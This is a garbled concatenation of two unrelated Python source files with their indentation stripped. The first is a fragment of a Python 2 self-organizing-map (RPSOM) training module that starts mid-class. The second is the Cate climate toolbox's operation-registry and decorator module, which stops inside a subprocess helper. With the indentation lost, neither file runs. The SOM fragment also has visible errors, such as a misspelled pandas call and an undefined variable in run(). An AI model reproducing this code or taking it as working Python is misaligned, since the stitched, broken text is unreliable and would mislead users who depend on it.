self.input_x = np.zeros((input_num, input_size))
for i in range(len(self.alpha_max)):
for j in range(len(self.sigma_max)):
self.som.append ( SOM ( epochs=self.epochs
, map_size_y=self.map_size_y, map_size_x=self.map_size_x
, input_num=self.input_num, input_size=self.input_size
, class_names=self.class_names
, feature_names=self.feature_names
, input_file=input_file
, alpha_max=alpha_max[i], alpha_min=alpha_min[i]
, sigma_max=sigma_max[j], sigma_min=sigma_min[j]
)
)
def load_input_csv (self, csv):
import pandas
data = Pandas.read_csv (csv, index_col='label')
tmp = data.matrix()
self.input_x = tmp[:,:]
shape = self.input_x.shape
if self.input_num != shape[0]:
print "The number of input data sets dose not match the initial state."
exit()
if self.input_size != shape[1]:
print "The feature size of input data dose not match the initial state."
exit()
self.class_names = list(data.index)
self.feature_names = list(data.columns)
def weights_output_csv (self, csv):
filename=csv
import pandas
for i, som in enumerate(self.som):
filename = "%s_%d.csv" % (csv, i)
new_array = np.reshape(som.weights, (self.map_size_x*self.map_size_y, self.input_size))
df = pandas.DataFrame (new_array)
df.columns = self.class_names
df.to_csv (filename)
def weight_output_csv (self, csv):
self.som[0].weight_output_csv(csv)
def weights_load_csv (self, csv):
filename = csv
import pandas
for i, som in enumerate(self.som):
filename = "%s_%d.csv" % (csv, i)
data = pandas.read_csv(filename, index_col=0)
tmp = data.as_matrix()
self.weights = np.reshape(tmp, (self.map_size_y, self.map_size_x, self.input_size))
def weight_load_csv (self, csv):
for som in self.som:
som.weight_load_csv (csv)
def to_json (self, filename):
import json
fp = open (filename, "w")
json.dump (self.config, fp)
fp.close()
def from_json (self, filename):
import json
fp = open (filename, "r")
self.config = json.load(fp)
fp.close()
RPSOM_config.dict2config(self)
self.recreate ()
def fit (self, trainX, epochs=10, verbose=0, topology="gaussian"
, callbacks=None, shuffle=True, interval=1
, alpha_func=coef.RP_alpha_func, sigma_func=coef.RP_sigma_func
, unrelated_columns=None):
if interval<=0:
print "Please set an interval with a positive integer."
return
if shuffle :
_index = np.random.permutation(self.input_num)
self.input_x = trainX[_index]
_names = np.array(self.class_names)
self.class_names = list(_names[_index])
for som in self.som:
som.input_x = self.input_x
som.class_names = self.class_names
else :
self.input_x = trainX
for som in self.som:
som.input_x=trainX
if callbacks is None:
cb_fg = 0
else :
cb_fg = 1
tmp_inputx = self.input_x
colid =[]
if unrelated_columns is not None:
for uncols in unrelated_columns:
if type(uncols) is int:
colid.append(uncols)
else :
colid.append(self.feature_names.index(uncols))
tmp_inputx = np.delete (tmp_inputx, colid, 1)
self.alpha_tbl = alpha_func(alpha_max=self.alpha_max, alpha_min=self.alpha_min, epochs=epochs)
self.sigma_tbl = sigma_func(sigma_max=self.sigma_max, sigma_min=self.sigma_min, epochs=epochs)
len_sig = len(self.sigma_max)
len_alp = len(self.alpha_max)
for epoch in range(epochs):
for i in range(len_alp):
for j in range(len_sig):
tmp_weights = self.som[i*len_sig+j].weights
tmp_weights = np.delete (tmp_weights, colid, 2)
self.som[i*len_sig+j].search_BMU(inputx=tmp_inputx, weights=tmp_weights)
if cb_fg is 1:
self.som[i*len_sig+j].write_BMU()
if self.log_fp:
self.som[i*len_sig+j].fwrite_BMU()
self.som[i*len_sig+j].modify(epoch=epoch, epochs=epochs, verbose=verbose, topology=topology, alpha=self.alpha_tbl[i], sigma=self.sigma_tbl[j], log_fp=self.log_fp)
self.som[i*len_sig+j].som_mapping(epoch=epoch, inputx=self.input_x, weights=self.som[i*len_sig+j].weights)
if epoch % interval == 0:
Dif, Fit, total = map_eval(self)
min_index = total.index(min(total))
self.d_indx.append(min_index)
if verbose != 0:
print "min.evaluation: id: %d dif: %f fit: %f sum: %f\n" % (min_index, Dif[min_index], Fit[min_index], total[min_index])
if self.log_fp:
self.log_fp.write("min.evaluation: id %d dif: %f fit: %f sum: %f\n\n" % (min_index, Dif[min_index], Fit[min_index], total[min_index]))
for i, som in enumerate(self.som):
if i != min_index:
som.weights[:,:,:] = self.som[min_index].weights[:,:,:]
som.mapping[:,:] = self.som[min_index].mapping[:,:]
print "best matching map: %d" % min_index
if self.log_fp:
self.log_fp.write("Best matching Map: No. %d\n" % min_index)
self.log_fp.close()
def maps_output2wrl_squ (self, grad, func=Map.thick_func_weights, drawable="weights", filename=None):
for i, som in enumerate(self.som):
som.map_output2wrl_squ (grad=100, index=i, filename=filename)
def map_output2wrl_squ (self, grad, func=Map.thick_func_weights, drawable="weights", index="", filename=None):
Map.output_rgb_wrl_squ (self.som[0], grad, func=func, drawable=drawable, index=index, filename=filename)
def maps_output2wrl_gray_squ (self, filename):
for i, som in enumerate(self.som):
fname = "%s_%d" %(filename, i)
som.map_output2wrl_gray_squ (fname)
def map_output2wrl_gray_squ (self, filename):
Map.output_gray_wrl_squ (self.som[0], filename=filename)
def map_output2wrl_gray_hex (self, filename):
Map.output_gray_wrl_hex (self.som[0], filename=filename)
def trans_graph (rpsom, filename="trans_graph.png"):
ay=[]
sy=[]
x = np.arange(0, rpsom.epochs)
for epoch in range(rpsom.epochs):
ay.append(rpsom.alpha_tbl[rpsom.d_indx[epoch]/len(rpsom.sigma_max)][epoch])
sy.append(rpsom.sigma_tbl[rpsom.d_indx[epoch]%len(rpsom.alpha_max)][epoch])
from matplotlib import pyplot as plt
fig, ax1 = plt.subplots()
ax2 = ax1.twinx()
lns3 = ax2.plot(x, rpsom.d_indx, 'g', label="np")
lns1 = ax1.plot(x, ay, 'b', label="alpha")
lns2 = ax2.plot(x, sy, 'r', label="sigma")
lns = lns1+lns2+lns3
labs = [l.get_label() for l in lns]
ax1.legend(lns, labs,loc=0)
ax1.set_ylabel('alpha')
ax2.set_ylabel('sigma')
ax1.set_xlabel('epoch')
ax1.set_ylim(ymin=0, ymax=1)
ymax = np.max(rpsom.sigma_tbl)
ax2.set_ylim(ymin=0, ymax=ymax)
plt.savefig(filename)
@logger.time_rap
def run ( input_file=None, input_x=None
, epochs=100, map_size_x=20, map_size_y=20
, input_num=16, input_size=16
, class_name=None, feature_names=None
, drawable="weights", func=Map.thick_func_weights
, grad=100, verbose=1, interval=1
, alpha_max=[0.1, 0.3, 0.5]
, alpha_min=[0.01, 0.05, 0.1]
, sigma_max=[5, 7, 10]
, sigma_min=[1, 3, 5]
, topology="gaussian"
, callbacks=None, shuffle=True
, output_file="output_map"
, unrelated_columns = None
):
if input_x is None and input_file is None:
print "Input vector is not set."
quit()
else :
rpsom=RPSOM( epochs=epochs
, map_size_x=map_size_x, map_size_y=map_size_y
, input_num=input_num, input_size=input_size
, class_names=class_name, feature_names=feature_names
, input_file=input_file
, alpha_max=alpha_max, alpha_min=alpha_min
, sigma_max=sigma_max, sigma_min=sigma_min
)
if input_x:
som.input_x = input_x
if drawable in ("indexes", "Indexes", "INDEXES", "index", "Index"):
grad = som.input_num
rpsom.fit ( trainX=rpsom.input_x, epochs=epochs, verbose=verbose
, topology=topology, callbacks=callbacks, shuffle=shuffle
, interval=interval
, alpha_func=coef.RP_alpha_func, sigma_func=coef.RP_sigma_func
, unrelated_columns = unrelated_columns)
for som in rpsom.som:
som.som_mapping(epoch=epochs-1, inputx=rpsom.input_x, weights=som.weights)
for i, som in enumerate(rpsom.som):
Map.output_rgb_wrl_squ(som=som, grad=grad, func=func, drawable=drawable, filename=output_file, index=i)
output_file = "output_map_" + str(i)
Map.output_gray_wrl_squ(som=som, filename=output_file)
def classifier (rpsom, verbose=0, topology="gaussian", callbacks=None, shuffle=False, interval=1, alpha_func=coef.RP_alpha_func, sigma_func=coef.RP_sigma_func):
rpsom.fit( rpsom.input_x, epochs=rpsom.epochs, verbose=verbose
, topology=topology, callbacks=callbacks, shuffle=shuffle
, interval=interval
, alpha_func=alpha_func, sigma_func=sigma_func
)
|
|
# The MIT License (MIT)
# Copyright (c) 2016, 2017 by the ESA CCI Toolbox development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Description
===========
This modules provides classes and functions allowing to maintain *operations*. Operations can be called from
the Cate command-line interface, may be referenced from within processing workflows, or may be called remotely
e.g. from graphical user interface or web frontend. An operation (:py:class:`Operation`) comprises a Python callable
and some additional meta-information (:py:class:`OpMetaInfo`) that allows for automatic input validation,
input value conversion, monitoring, and inter-connection of multiple operations using processing workflows and steps.
Operations are registered in operation registries (:py:class:`OpRegistry`), the default operation registry is
accessible via the global, read-only ``OP_REGISTRY`` variable.
Technical Requirements
======================
**Operation registration, lookup, and invocation**
:Description: Maintain a central place in the software that manages the available operations such as data processors,
data converters, analysis functions, etc. Operations can be added, removed and retrieved.
Operations are designed to be executed by the framework in a controlled way, i.e. an operation's task
can be monitored and cancelled, it's input and out values can be validated w.r.t. the operation's meta-information.
:URD-Sources:
* CCIT-UR-CR0001: Extensibility.
* CCIT-UR-E0002: dynamic extension of all modules at runtime, c) The Logic Module to introduce new processors
* CCIT-UR-LM0001: processor management allowing easy selection of tools and functionalities
----
**Exploit Python language features**
:Description: Exploit Python language to let API users express an operation in an intuitive form. For the framework API,
stay with Python base types as far as possible instead of introducing a number of new data structures.
Let the framework derive meta information such as names, types and documentation for the operation, its inputs,
and its outputs from the user's Python code.
It shall be possible to register any Python-callable of the from ``f(*args, **kwargs)`` as an operation.
----
**Add extra meta-information to operations**
:Description: Initial operation meta-information will be derived from Python code introspection. It shall include
the user function's docstring and information about the arguments an its return values, exploiting any
type annotations.
For example, the following properties can be associated with input arguments: data type, default value, value set,
valid range, if it is mandatory or optional, expected dataset schema so that operations can be ECV-specific.
Meta-information is required to let an operation explain itself when used in a (IPython)
REPL or when web service is requested to respond with an operations's capabilities.
API users shall be able to extend the initial meta-information derived from Python code.
:URD-Source:
* CCIT-UR-LM0006: offer default values for lower level users as well as selectable options for higher level users.
* CCIT-UR-LM0002: accommodating ECV-specific processors in cases where the processing is specific to an ECV.
----
**Static annotation vs. dynamic, programmatic registration**
:Description: Operation registration and meta-information extension shall also be done by operation class /
function *decorators*. The API shall provide a simple set of dedicated decorators that API user's attach to their
operations. They will automatically register the user function as operation and add any extra meta-information.
----
**Operation monitoring**
:Description: Operation registration should recognise an optional *monitor* argument of a user function:
``f(*args, monitor=Monitor.NONE, **kwargs)``. In this case the a monitor (of type :py:class:`Monitor`)
will be passed by the framework to the user function in order to observe the progress and to cancel an operation.
----
Verification
============
The module's unit-tests are located in
`test/test_op.py <https://github.com/CCI-Tools/cate/blob/master/test/test_op.py>`_ and may be executed using
``$ py.test test/test_op.py --cov=cate/core/plugin.py`` for extra code coverage information.
Components
==========
"""
import sys
from collections import OrderedDict
from typing import Union, Callable, Optional, Dict
import xarray as xr
from .types import ValidationError
from ..util.opmetainf import OpMetaInfo
from ..util.monitor import Monitor
from ..util.undefined import UNDEFINED
from ..util.safe import safe_eval
from ..util.process import run_subprocess, ProcessOutputMonitor
from ..util.tmpfile import new_temp_file, del_temp_file
from ..util.misc import object_to_qualified_name
from ..version import __version__
__author__ = "Norman Fomferra (Brockmann Consult GmbH)"
_MONITOR = OpMetaInfo.MONITOR_INPUT_NAME
_RETURN = OpMetaInfo.RETURN_OUTPUT_NAME
class Operation:
"""
An Operation comprises a wrapped callable (e.g. function, constructor, lambda form)
and additional meta-information about the wrapped operation itself and its inputs and outputs.
:param wrapped_op: some callable object that will be wrapped.
:param op_meta_info: operation meta information.
"""
def __init__(self, wrapped_op: Callable, op_meta_info=None):
if callable is None:
raise ValueError('wrapped_op must be given')
if not callable(wrapped_op):
raise ValueError('wrapped_op must be callable')
if op_meta_info is None:
# Try unwrapping wrapped_op
try:
# noinspection PyUnresolvedReferences
op_meta_info = wrapped_op.op_meta_info
try:
# noinspection PyUnresolvedReferences
wrapped_op = wrapped_op.wrapped_op
except AttributeError:
pass
except AttributeError:
pass
self._wrapped_op = wrapped_op
self._op_meta_info = op_meta_info or OpMetaInfo.introspect_operation(wrapped_op)
for attr_name in ['__module__', '__name__', '__qualname__', '__doc__', '__file__']:
try:
setattr(self, attr_name, getattr(wrapped_op, attr_name))
except AttributeError:
pass
@property
def op_meta_info(self) -> OpMetaInfo:
"""
:return: Meta-information about the operation, see :py:class:`cate.core.op.OpMetaInfo`.
"""
return self._op_meta_info
@property
def wrapped_op(self) -> Callable:
"""
:return: The actual operation object which may be any callable.
"""
return self._wrapped_op
def __str__(self):
return '%s: %s' % (self._wrapped_op, self._op_meta_info)
def __call__(self, *args, monitor: Monitor = Monitor.NONE, **kwargs):
"""
Perform this operation.
:param args: the arguments
:param monitor: an optional progress monitor, which is passed to the wrapped callable, if it supports it.
:param kwargs: the keyword arguments
:return: the operation output.
"""
input_values = kwargs
# process arguments, if any
num_args = len(args)
if num_args:
input_names = self.op_meta_info.input_names
for position in range(num_args):
if position >= len(input_names):
raise ValueError(
"too many inputs given for operation '{}'".format(self.op_meta_info.qualified_name))
input_name = self.op_meta_info.input_names[position]
input_values[input_name] = args[position]
# set default_value where input values are missing
self.op_meta_info.set_default_input_values(input_values)
# validate the input_values using this operation's meta-info
self.op_meta_info.validate_input_values(input_values, validation_exception_class=ValidationError)
if self.op_meta_info.has_monitor:
# set the monitor only if it is an argument
input_values[_MONITOR] = monitor
# call the callable
return_value = self._wrapped_op(**input_values)
if self.op_meta_info.has_named_outputs:
# return_value is expected to be a dictionary-like object
# set default_value where output values in return_value are missing
for name, properties in self.op_meta_info.outputs.items():
if name not in return_value or return_value[name] is None:
return_value[name] = properties.get('default_value')
# validate the return_value using this operation's meta-info
self.op_meta_info.validate_output_values(return_value)
# Add history information to outputs
for name, properties in self.op_meta_info.outputs.items():
add_history = properties.get('add_history')
if add_history:
return_value[name] = self._add_history(return_value[name], input_values)
else:
# return_value is a single value, not a dict
# set default_value if return_value is missing
properties = self.op_meta_info.outputs[_RETURN]
if return_value is None:
return_value = properties.get('default_value')
# validate the return_value using this operation's meta-info
self.op_meta_info.validate_output_values({_RETURN: return_value})
# Add history information to the output
add_history = properties.get('add_history')
if add_history:
return_value = self._add_history(return_value, input_values)
return return_value
def _add_history(self, ds: object, input_dict) -> object:
"""
Add provenance information about cate, the operation and its inputs to
the given output.
:return: Dataset with history information appended
"""
op_name = self.op_meta_info.qualified_name
# There can potentially be different ways to stamp an output depending
# on its type
if not isinstance(ds, xr.Dataset):
raise NotImplementedError('Operation "{}": Adding history information to an'
' output is currently implemented only'
' for outputs of type "xarray.Dataset".'.format(op_name))
# Construct our own dict to stringify, otherwise the full input dataset
# repr will be found in history.
input_str = dict()
for key in input_dict:
value = input_dict[key]
if isinstance(value, xr.Dataset):
# We only show that 'a dataset' was provided, instead of
# putting the full dataset repr in history
input_str[key] = type(value)
continue
input_str[key] = value
# Format the stamp
try:
op_version = self.op_meta_info.header['version']
except KeyError:
raise ValueError('Operation "{}": Could not add history information'
' because the "version" property is undefined.'.format(op_name))
stamp = '\nModified with Cate v' + __version__ + ' ' + \
op_name + ' v' + \
op_version + \
' \nDefault input values: ' + \
str(self.op_meta_info.inputs) + '\nProvided input values: ' + \
str(input_str) + '\n'
# Append the stamp to existing history information or create history
# attribute if none is found
if 'history' in ds.attrs:
if isinstance(ds.attrs['history'], str):
ds.attrs['history'] = ds.attrs['history'] + stamp
elif isinstance(ds.attrs['history'], list):
if isinstance(ds.attrs['history'], dict):
ds.attrs['history'][0]['program'] = ds.attrs['history'][0]['program'] + stamp
else:
ds.attrs['history'].append(stamp)
else:
ds.attrs['history'] = stamp
else:
ds.attrs['history'] = stamp
return ds
class OpRegistry:
"""
An operation registry allows for addition, removal, and retrieval of operations.
"""
def __init__(self):
self._op_registrations = OrderedDict()
@property
def op_registrations(self) -> OrderedDict:
"""
Get all operation registrations of type :py:class:`cate.core.op.Operation`.
:return: a mapping of fully qualified operation names to operation registrations
"""
return OrderedDict(sorted(self._op_registrations.items(), key=lambda item: item[0]))
def add_op(self, operation: Callable, fail_if_exists=True, replace_if_exists=False) -> Operation:
"""
Add a new operation registration.
:param operation: A operation object such as a class or any callable.
:param fail_if_exists: raise ``ValueError`` if the operation was already registered
:param replace_if_exists: replaces an existing operation if *fail_if_exists* is ``False``
:return: a new or existing :py:class:`cate.core.op.Operation`
"""
operation = self._unwrap_operation(operation)
op_key = self.get_op_key(operation)
if op_key in self._op_registrations:
if fail_if_exists:
raise ValueError("operation with name '%s' already registered" % op_key)
elif not replace_if_exists:
return self._op_registrations[op_key]
op_registration = Operation(operation)
self._op_registrations[op_key] = op_registration
return op_registration
def remove_op(self, operation: Callable, fail_if_not_exists=False) -> Optional[Operation]:
"""
Remove an operation registration.
:param operation: A fully qualified operation name or operation object such as a class or any callable.
:param fail_if_not_exists: raise ``ValueError`` if no such operation was found
:return: the removed :py:class:`cate.core.op.Operation` object or ``None``
if *fail_if_not_exists* is ``False``.
"""
operation = self._unwrap_operation(operation)
op_key = self.get_op_key(operation)
if op_key not in self._op_registrations:
if fail_if_not_exists:
raise ValueError("operation with name '%s' not registered" % op_key)
else:
return None
return self._op_registrations.pop(op_key)
def get_op(self, operation, fail_if_not_exists=False) -> Operation:
"""
Get an operation registration.
:param operation: A fully qualified operation name or operation object such as a class or any callable.
:param fail_if_not_exists: raise ``ValueError`` if no such operation was found
:return: a :py:class:`cate.core.op.Operation` object or ``None`` if *fail_if_not_exists* is ``False``.
"""
operation = self._unwrap_operation(operation)
op_key = self.get_op_key(operation)
op_registration = self._op_registrations.get(op_key, None)
if op_registration is None and fail_if_not_exists:
raise ValueError("operation with name '%s' not registered" % op_key)
return op_registration
# noinspection PyMethodMayBeStatic
def get_op_key(self, operation: Union[str, Callable]):
"""
Get a key under which the given operation will be registered.
:param operation: A fully qualified operation name or a callable object
:return: The operation key
"""
try:
qualified_name = operation.op_meta_info.qualified_name
except AttributeError:
if isinstance(operation, str):
qualified_name = operation
else:
operation = self._unwrap_operation(operation)
qualified_name = object_to_qualified_name(operation)
if qualified_name.startswith('cate.ops.'):
return qualified_name.rsplit('.', maxsplit=1)[1]
else:
return qualified_name
@classmethod
def _unwrap_operation(cls, operation):
if not operation:
raise ValueError('operation must be given')
try:
return operation.wrapped_op
except AttributeError:
return operation
class _DefaultOpRegistry(OpRegistry):
def __repr__(self):
return 'OP_REGISTRY'
# check (nf) - for more flexibility, REGISTRY may be configured by dependency injection
# see Python libs 'pinject' (Google), 'inject', and others
#: The default operation registry of type :py:class:`cate.core.op.OpRegistry`.
OP_REGISTRY = _DefaultOpRegistry()
def op(tags=UNDEFINED,
version=UNDEFINED,
res_pattern=UNDEFINED,
deprecated=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op`` is a decorator function that registers a Python function or class in the default operation registry or
the one given by *registry*, if any.
Any other keywords arguments in *header* are added to the operation's meta-information header.
Classes annotated by this decorator must have callable instances.
When a function is registered, an introspection is performed. During this process, initial operation
the meta-information header property *description* is derived from the function's docstring.
If any output of this operation will have its history information
automatically updated, there should be version information found in the
operation header. Thus it's always a good idea to add it to all operations::
@op(version='X.x')
:param tags: An optional list of string tags.
:param version: An optional version string.
:param res_pattern: An optional pattern that will be used to generate the names for data resources that are
used to hold a reference to the objects returned by the operation and that are cached in a Cate workspace.
Currently, the only pattern variable that is supported and that must be present is ``{index}`` which will
be replaced by an integer number that is guaranteed to produce a unique resource name.
:param deprecated: An optional boolean or a string. If a string is used, it should explain
why the operation has been deprecated and which new operation to use instead.
If set to ``True``, the operation's doc-string should explain the deprecation.
:param registry: The operation registry.
:param properties: Other properties (keyword arguments) that will be added to the meta-information of operation.
"""
def decorator(op_func):
new_properties = dict(tags=tags,
version=version,
res_pattern=res_pattern,
deprecated=deprecated,
**properties)
op_registration = registry.add_op(op_func, fail_if_exists=False)
op_registration.op_meta_info.header.update({k: v for k, v in new_properties.items() if v is not UNDEFINED})
return op_registration
return decorator
def op_input(input_name: str,
default_value=UNDEFINED,
units=UNDEFINED,
data_type=UNDEFINED,
nullable=UNDEFINED,
value_set_source=UNDEFINED,
value_set=UNDEFINED,
value_range=UNDEFINED,
script_lang=UNDEFINED,
deprecated=UNDEFINED,
position=UNDEFINED,
context=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op_input`` is a decorator function that provides meta-information for an operation input identified by
*input_name*. If the decorated function or class is not registered as an operation yet, it is added to the default
operation registry or the one given by *registry*, if any.
When a function is registered, an introspection is performed. During this process, initial operation
meta-information input properties are derived for each positional and keyword argument named *input_name*:
================ ==============================================================================
Derived property Source
================ ==============================================================================
*position* The position of a positional argument, e.g. ``2`` for input ``z`` in
``def f(x, y, z, c=2)``.
*default_value* The value of a keyword argument, e.g. ``52.3`` for input ``latitude``
from argument definition ``latitude:float=52.3``
*data_type* The type annotation type, e.g. ``float`` for input ``latitude``
from argument definition ``latitude:float``
================ ==============================================================================
The derived properties listed above plus any of *value_set*, *value_range*, and any key-value pairs in *properties*
are added to the input's meta-information.
A key-value pair in *properties* will always overwrite the derived properties listed above.
:param input_name: The name of an input.
:param default_value: A default value.
:param units: The geo-physical units of the input value.
:param data_type: The data type of the input values.
If not given, the type of any given, non-None *default_value* is used.
:param nullable: If ``True``, the value of the input may be ``None``.
If not given, it will be set to ``True`` if the *default_value* is ``None``.
:param value_set_source: The name of an input, which can be used to generate a dynamic value set.
:param value_set: A sequence of the valid values. Note that all values in this sequence
must be compatible with *data_type*.
:param value_range: A sequence specifying the possible range of valid values.
:param script_lang: The programming language for a parameter of data_type "str" that provides source
code of a script, e.g. "python".
:param deprecated: An optional boolean or a string. If a string is used, it should explain
why the input has been deprecated and which new input to use instead.
If set to ``True``, the input's doc-string should explain the deprecation.
:param position: The zero-based position of an input.
:param context: If ``True``, the value of the operation input will be a dictionary representing
the current execution context. For example,
when the operation is executed from a workflow, the dictionary will hold at least three
entries: ``workflow`` provides the current workflow, ``step`` is the currently executed step,
and ``value_cache`` which is a mapping from step identifiers to step outputs. If *context* is a
string, the value of the operation input will be the result of evaluating the string as Python expression
with the current execution context as local environment. This means, *context* may be an expression
such as 'value_cache', 'workspace.base_dir', 'step', 'step.id'.
:param properties: Other properties (keyword arguments) that will be added to the
meta-information of the named output.
:param registry: Optional operation registry.
"""
def decorator(op_func):
op_registration = registry.add_op(op_func, fail_if_exists=False)
input_namespace = op_registration.op_meta_info.inputs
if input_name not in input_namespace:
input_namespace[input_name] = dict()
new_properties = dict(data_type=data_type,
default_value=default_value,
units=units,
nullable=nullable,
value_set_source=value_set_source,
value_set=value_set,
value_range=value_range,
script_lang=script_lang,
deprecated=deprecated,
position=position,
context=context,
**properties)
input_namespace[input_name].update({k: v for k, v in new_properties.items() if v is not UNDEFINED})
_adjust_input_properties(input_namespace[input_name])
return op_registration
return decorator
def op_output(output_name: str,
data_type=UNDEFINED,
deprecated=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op_output`` is a decorator function that provides meta-information for an operation output identified by
*output_name*. If the decorated function or class is not registered as an operation yet, it is added to the default
operation registry or the one given by *registry*, if any.
If your function does not return multiple named outputs, use the :py:func:`op_return` decorator function.
Note that::
@op_return(...)
def my_func(...):
...
if equivalent to::
@op_output('return', ...)
def my_func(...):
...
To automatically add information about cate, its version, this operation
and its inputs, to this output, set 'add_history' to True::
@op_output('name', add_history=True)
Note that the operation should have version information added to it when
add_history is True::
@op(version='X.x')
:param output_name: The name of the output.
:param data_type: The data type of the output value.
:param deprecated: An optional boolean or a string. If a string is used, it should explain
why the output has been deprecated and which new output to use instead.
If set to ``True``, the output's doc-string should explain the deprecation.
:param properties: Other properties (keyword arguments) that
will be added to the meta-information of the named output.
:param registry: Optional operation registry.
"""
def decorator(op_func):
op_registration = registry.add_op(op_func, fail_if_exists=False)
output_namespace = op_registration.op_meta_info.outputs
if not op_registration.op_meta_info.has_named_outputs:
# if there is only one entry and it is the 'return' entry, rename it to value of output_name
output_properties = output_namespace[OpMetaInfo.RETURN_OUTPUT_NAME]
del output_namespace[OpMetaInfo.RETURN_OUTPUT_NAME]
output_namespace[output_name] = output_properties
elif output_name not in output_namespace:
output_namespace[output_name] = dict()
new_properties = dict(data_type=data_type, deprecated=deprecated, **properties)
output_namespace[output_name].update({k: v for k, v in new_properties.items() if v is not UNDEFINED})
return op_registration
return decorator
def op_return(data_type=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op_return`` is a decorator function that provides meta-information for a single, anonymous operation return value
(whose output name is ``"return"``). If the decorated function or class is not registered as an operation yet,
it is added to the default operation registry or the one given by *registry*, if any.
Any other keywords arguments in *properties* are added to the output's meta-information.
When a function is registered, an introspection is performed. During this process, initial operation
meta-information output properties are derived from the function's return type annotation, that is
*data_type* will be e.g. ``float`` if a function is annotated as ``def f(x, y) -> float: ...``.
The derived *data_type* property and any key-value pairs in *properties* are added to the output's meta-information.
A key-value pair in *properties* will always overwrite a derived *data_type*.
If your function returns multiple named outputs, use the :py:func:`op_output` decorator function.
Note that::
@op_return(...)
def my_func(...):
...
if equivalent to::
@op_output('return', ...)
def my_func(...):
...
To automatically add information about cate, its version, this operation
and its inputs, to this output, set 'add_history' to True::
@op_return(add_history=True)
Note that the operation should have version information added to it when
add_history is True::
@op(version='X.x')
:param data_type: The data type of the return value.
:param properties: Other properties (keyword arguments)
that will be added to the meta-information of the return value.
:param registry: The operation registry.
"""
return op_output(OpMetaInfo.RETURN_OUTPUT_NAME,
data_type=data_type,
registry=registry,
**properties)
def _adjust_input_properties(input_properties):
"""Adjust any undefined input properties that can be derived from other defined input properties."""
default_value = input_properties.get('default_value', UNDEFINED)
# Derive undefined 'nullable' from 'default_value'
nullable = input_properties.get('nullable', UNDEFINED)
if nullable is UNDEFINED and default_value is None:
input_properties['nullable'] = True
# Derive undefined 'data_type' from 'default_value'
data_type = input_properties.get('data_type', UNDEFINED)
if data_type is UNDEFINED and not (default_value is UNDEFINED or default_value is None):
input_properties['data_type'] = type(default_value)
def new_subprocess_op(op_meta_info: OpMetaInfo,
command_pattern: str,
run_python: bool = False,
cwd: Optional[str] = None,
env: Dict[str, str] = None,
shell: bool = False,
started: Union[str, Callable] = None,
progress: Union[str, Callable] = None,
done: Union[str, Callable] = None) -> Operation:
r"""
Create an operation for a child program run in a new process.
:param op_meta_info: Meta-information about the resulting operation and the operation's inputs and outputs.
:param command_pattern: A pattern that will be interpolated to obtain the actual command to be executed.
May contain "{input_name}" fields which will be replaced by the actual input value converted to text.
*input_name* must refer to a valid operation input name in *op_meta_info.input* or it must be
the value of either the "write_to" or "read_from" property of another input's property map.
:param run_python: If True, *command_pattern* refers to a Python script which will be executed with
the Python interpreter that Cate uses.
:param cwd: Current working directory to run the command line in.
:param env: Environment variables passed to the shell that executes the command line.
:param shell: Whether to use the shell as the program to execute.
:param started: Either a callable that receives a text line from the executable's stdout
and returns a tuple (label, total_work) or a regex that must match
in order to signal the start of progress monitoring.
The regex must provide the group names "label" or "total_work" or both,
e.g. "(?P<label>\w+)" or "(?P<total_work>\d+)"
:param progress: Either a callable that receives a text line from the executable's stdout
and returns a tuple (work, msg) or a regex that must match
in order to signal process.
The regex must provide group names "work" or "msg" or both,
e.g. "(?P<msg>\w+)" or "(?P<work>\d+)"
:param done: Either a callable that receives a text line a text line from the executable's stdout
and returns True or False or a regex that must match
in order to signal the end of progress monitoring.
:return: The executable wrapped into an operation.
"""
if started or progress and not op_meta_info.has_monitor:
op_meta_info = OpMetaInfo(op_meta_info.qualified_name,
has_monitor=True,
inputs=op_meta_info.inputs,
outputs=op_meta_info.outputs,
header=op_meta_info.header)
# Idea: process special input properties:
# - "is_cwd" - an input that provides the current working directory, must be of type str
# - "is_env" - an input that provides environment variables, must be of type DictLike
# - "is_output" - an input that provides the file path of an output, must be of type str
def run_executable(**kwargs):
format_kwargs = {}
temp_input_files = {}
temp_output_files = {}
for name, props in op_meta_info.inputs.items():
value = kwargs.get(name, props.get('default_value', UNDEFINED))
if value is not UNDEFINED:
if 'write_to' in props:
new_name = props['write_to']
_, file = new_temp_file(suffix='.nc')
value.to_netcdf(file)
format_kwargs[new_name] = file
temp_input_files[name] = file
else:
try:
value = value.format()
except AttributeError:
pass
format_kwargs[name] = value
for name, props in op_meta_info.outputs.items():
if 'read_from' in props:
new_name = props['read_from']
_, file = new_temp_file(suffix='.nc')
format_kwargs[new_name] = file
temp_output_files[name] = file
monitor = None
if _MONITOR in format_kwargs:
monitor = format_kwargs.pop(_MONITOR)
command = command_pattern.format(**format_kwargs)
stdout_handler = None
if monitor:
stdout_handler = ProcessOutputMonitor(monitor,
label=command,
started=started, progress=progress, done=done)
if run_python:
command = '"{}" {}'.format(sys.executable, command)
exit_code = run_subprocess(command,
cwd=cwd, env=env, shell=shell,
stdout_handler=stdout_handler,
is_cancelled=monitor.is_cancelled if monitor else None)
for file in temp_input_files.values():
del_temp_file(file)
return_value = {}
for name, file in temp_output_files.items():
return_value[name] = xr.open_dataset(file)
if not return_value:
# No output specified, so we return exit code
return exit_code
if exit_code:
# There is output specified, but exit code signals error
raise ValueError('command [{}] exited with code {}'.format(command_pattern, exit_code))
